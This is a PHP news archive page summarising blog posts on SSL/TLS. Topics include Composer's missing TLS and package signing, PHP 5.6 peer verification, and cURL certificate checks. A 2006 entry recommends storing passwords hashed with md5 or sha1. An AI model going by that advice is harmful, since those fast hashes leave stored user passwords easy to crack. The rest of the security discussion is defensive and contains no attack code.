News Feed
Sections




News Archive
feed this:

Looking for more information on how to do PHP the right way? Check out PHP: The Right Way

Pádraic Brady:
Thoughts on Composer's Future Security
March 06, 2014 @ 11:09:06

Pádraic Brady has a new "let's watch Paddy think aloud in a completely unstructured manner blog post" about the future of security when it comes to the popular PHP package manager Composer. It's recently come under criticism around its lack of package signing and TLS/SSL support.

The Composer issue, as initially reported by Kevin McArthur, was fairly simple. Since no download connection by Composer was properly secured using SSL/TLS then an attacker could, with the assistance of a Man-In-The-Middle (MITM) attack, substitute the package you wanted to download with a modified version that communicated with the attacker's server. They could, for example, plant a line of code which sends the contents of $_POST to the attacker's server.

He's been working on some updates to the project, one of with is TLS/SSL support as defined in this pull request currently pending. It enables peer verification by default, follows PHP 5.6 TLS recommendations and uses local system certificates in the connection. He talks some about other additional TLS/SSL measures that could be added in the future and how, despite it being safer than nothing, TLS/SSL is not the "cure all" for the problem.

He then moves on to package signing and suggests one method for implementation - signing the "composer.phar" executable and signing "everything else" (packages to be downloaded) to verify their validity.

The flaw in Composer's installer isn't that it's unsigned, it's that it doesn't afford the opportunity for the downloader to read it before it gets piped to PHP. It's a documentation issue. You can go down the route of using a CA, of course, but that's further down the rabbit hole than may be necessary. Signing the composer.phar file is another matter.
0 comments voice your opinion now!
composer package signing tls ssl support security

Link: http://blog.astrumfutura.com/2014/03/thoughts-on-composers-future-security

Pádraic Brady:
PHP 5.6 and SSL/TLS Getting Better But Will PHP Programmers Actually Use It?
January 31, 2014 @ 11:24:32

In his latest post Pádraic Brady looks at a new addition to PHP (well, to be included in the next release) related to the SSL/TLS handling it provides in streams. He's happy to report that things are improving. This commit integrated an RFC allowing for TLS perr verification in PHP streams.

The RFC reverses PHP's course and provides PHP streams with defaults that enable both peer verification and host verification. The patch implements the RFC and it lets PHP leverage the local system's own certificate stash (e.g. Debian's ca-certificates) where possible to avoid PHP having to distribute a bundle of its own and while also assisting in backwards compatibility. [...] Once we have a PHP streams/sockets system with a passable level of default security, the rest will be left to programmers on the ground to change their practices.

With this new functionality coming in PHP 5.6, he strongly encourages developers to change how they're currently doing things and embrace this new verification to keep their code safer.

0 comments voice your opinion now!
ssl tls php56 programmer peer verification rfc

Link: http://blog.astrumfutura.com/2014/01/php-5-6-and-ssltls-getting-better-but-will-php-programmers-actually-use-it/

MySQL Performance Blog:
SSL Performance Overhead in MySQL
October 11, 2013 @ 11:30:28

On the MySQL Performance Blog there's a recent post looking at the impact of SSL in regards to the overall performance of your application. This is part one of a two part series and focuses largely on the results of two tests - one with connection pooling and the other to evaluate connection time.

Some of you may recall my security webinar from back in mid-August; one of the follow-up questions that I was asked was about the performance impact of enabling SSL connections. My answer was 25%, based on some 2011 data that I had seen over on yaSSL's website, but I included the caveat that it is workload-dependent, because the most expensive part of using SSL is establishing the connection. Not long thereafter, I received a request to conduct some more specific benchmarks surrounding SSL usage in MySQL, and today I'm going to show the results.

He details the environments used for testing including the hardware specs and the version of the software installed. The scripts (really just bash scripts that call sysbench) are included in the post and the results of the tests are both graphed out and dumped in tabular form. The results are pretty surprising, mostly having to do with just how much of an impact the SSL has on the the requests. He makes a few recommendations at the end of the post on how you can mitigate these problems though (hint: it's not about MySQL per se).

0 comments voice your opinion now!
performance overhead mysql ssl results benchmark sysbench

Link: http://www.mysqlperformanceblog.com/2013/10/10/mysql-ssl-performance-overhead/

Kevin Schroder:
What SSL $_SERVER variables are available in PHP
September 02, 2013 @ 09:24:04

Kevin Schroeder has shared the results of a question he wanted answered when it came to PHP with a HTTPS (SSL) connection - which of the $_SERVER variables are available.

I found myself wondering what HTTPS variables were available in the $_SERVER variable today and didn't find a specific list (and didn't have mod_ssl installed). So as a public service, here is what my server says.

Thanks to some of the additional handling and information the SSL connection provides to PHP, there's several additional variables including things like:

  • SSL_PROTOCOL
  • HTTPS (set to "on")
  • SSL_COMPRESS_METHOD
  • SSL_CLIENT_VERIFY
0 comments voice your opinion now!
ssl server superglobal variable

Link: http://www.eschrade.com/page/what-ssl-_server-variables-are-available-in-php/

Artur Ejsmont's Blog:
How to properly secure remote API calls over SSL from PHP code
September 19, 2011 @ 13:56:00

Artur Ejsmont has a new post with a passionate call to arms for anyone who thinks that just because their URL has "https" in it, it's secure. He presents his suggestion on how to properly secure SSL API calls for your PHP application.

Lets make something clear from the very start: JUST BECAUSE THERE IS https:// IN THE URL OF THE REMOTE SERVICE IT DOES NOT MEAN THE CONNECTION IS SECURE! I am sorry for the tone of this post but i am enraged by how popular this issue is online. If you ask why i suggest a little experiment [involving changing your hosts file and using a self-signed certificate].

The issue he spotlights is all too common - a server serves up SSL pages but doesn't actually verify the certificate in the process. He gives a bad example of how some scripts handle this issue using the CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST to turn off this verification - a very bad idea. To protect yourself from any kind of man-in-the-middle or DNS hijack issues, you should leave these on.

0 comments voice your opinion now!
ssl certificate api call protect verification


PHPBuilder.com:
Write an Ajax-driven Login Application in PHP Using SSL/TLS
September 09, 2010 @ 10:29:03

On the PHPBuilder.com site today there's a new tutorial posted from Octavia Anghel about creating a login for your site that's powered by Ajax and uses a bit more security than normal. It includes hooks to use the Ajax Server Secure Layer or an OpenSSL connection.

In this article you will learn how to write a login application in PHP using Ajax and SSL/TLS in two ways either using aSSL (Ajax Server Secure Layer), a library that implements a technology similar to SSL without HTTPS or a simple Ajax and OpenSSL, an open source implementation of the SSL and TLS protocols.

They start with the aSSL method and link you to a download of the tool as well as some sample code to help you get started passing data to it via the session. The second example shows the OpenSSL method, mostly consisting of checking on the server side of the certificate that's passed along with the request.

0 comments voice your opinion now!
ssl tls secure certificate assl openssl ajax


PHP Web Services:
How to configure https for Apache2.2 and consume PHP web services over https
May 24, 2010 @ 08:39:49

New from the PHP Web Services blog today there's a post showing you how to set up Apache 2.2 for HTTPS connections to consume other web services.

The tutorial gives you a step-by-step process to follow with commands and configuration changes every step of the way:

  • Create a certificate
  • Generate a key
  • Sign the key with the certificate
  • Copy the keys to the right directory
  • Make configuration changes for the SSL connections
  • Connect to the remote HTTPS web service

If you're using PHP, you can also use the OpenSSL and SOAP clients with the SSL libraries to make requests to secure remote resources.

0 comments voice your opinion now!
https apache configuration ssl tutorial


HowToForge.com:
The Ultimate Media Server - Apache+SSL , PHP, MySQL and Jinzora
February 08, 2006 @ 07:02:10

HowToForge.com has posted a new tutorial on the installation of the "ultimate meadia server" for personal use - built off of an Apacle+SSL, PHP, MySQL, and Jinzora base.

This guide will lead you through creating a secure ssl based webserver to be able to stream your multimedia across the World Wide Web. Before embarking on this journey I would highly recommend reading this documentation in it's fullest before executing any of it. You may find some pointers in the tips and tweaks section that you can make during installation that would make this install even easier and make it a one time install.

There are a few requirements they mention, but once that's all arranged, it's a pretty simple setup overall. It uses the Jinzora software to provide the media streaming/management component of the setup...

2 comments voice your opinion now!
media server mysql apache ssl jinzora media server mysql apache ssl jinzora


PHPit.net:
Handling passwords safely in PHP
February 06, 2006 @ 07:17:10

PHPit.net is back today with another new tutorial - this time it concerns the safe handling of passwords in your PHP scripts.

If you're ever going to create a script that involves users or passwords, which is very likely, you'll probably run across security issues with handling the passwords. You can't just store the passwords in clear text in your database, and great care must be used when managing the passwords (for example during login).

In this article I will show you everything that you have to think about when handling passwords in PHP, and how to solve some common problems.

They offer suggestions like storying them hashed (md5 or sha1), protecting them with a salt, SSL certificates, and how to manage their use with things like cookies and sessions.

0 comments voice your opinion now!
handle password safely logging signup md5 sha1 ssl handle password safely logging signup md5 sha1 ssl



Community Events





Don't see your event here?
Let us know!


update community language deployment api tips interview library zendserver series symfony opinion package install laravel introduction framework release list podcast

All content copyright, 2014 PHPDeveloper.org :: info@phpdeveloper.org - Powered by the Solar PHP Framework